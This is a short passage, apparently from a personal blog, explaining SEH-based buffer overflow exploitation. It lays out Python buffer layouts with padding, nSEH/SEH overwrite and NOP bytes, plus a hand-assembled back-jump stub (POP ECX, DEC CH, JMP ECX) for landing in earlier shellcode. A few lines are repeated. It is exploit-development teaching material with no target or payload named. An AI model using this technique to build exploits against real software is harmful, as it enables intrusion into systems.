junk1= 'A'*500
junk2= 'A'*12
buffy= junk1 + nseh + seh + '\x90'*8 + junk2
So, we need to jump back at least before the shellcode, for example our shellcode are 200 bytes, the buffer will be
buffy = 'A'*300 + shellcode + nseh + seh + '\x90'*8 + junk2
we need to jump back at least 220 bytes, to land in junk1, so we need 'junk2' to make us Jump back. to do this we can use decrement CH register (1 = 256 bytes decrease from ECX), but before doing that after we doing POP, POP, RETN the pointer three places down in the stack, to get this memory address to ECX register, we need to do POP ECX, POP ECX, POP ECX, after that Jump to ECX and it will moves back 256 from the original POP, POP, RETN instructions land.
So, here what we are doing
POP ECX \x59
POP ECX \x59
DEC CH \xfe\xcd
JMP ECX \xff\xe1
and the shellcode/payload for junk2 only 7 bytes long ("\x59\x59\x59\xfe\xcd\xff\xe1"), so the buffer will go
buffy = 'A'*300 + shellcode + nseh + seh + '\x90'*13 + "\x59\x59\x59\xfe\xcd\xff\xe1"
Voila!
* if you need approx 512 (dec CH twice)
Voila!
* if you need approx 512 (dec CH twice)
** i guess i never write about buffer overflow before, because there are so many great article about buffer overflow in other sites, but for this one i found it so rare.
*** or u could use egg-hunting or use jump short (\xe9)
*** or u could use egg-hunting or use jump short (\xe9)
No comments:
Post a Comment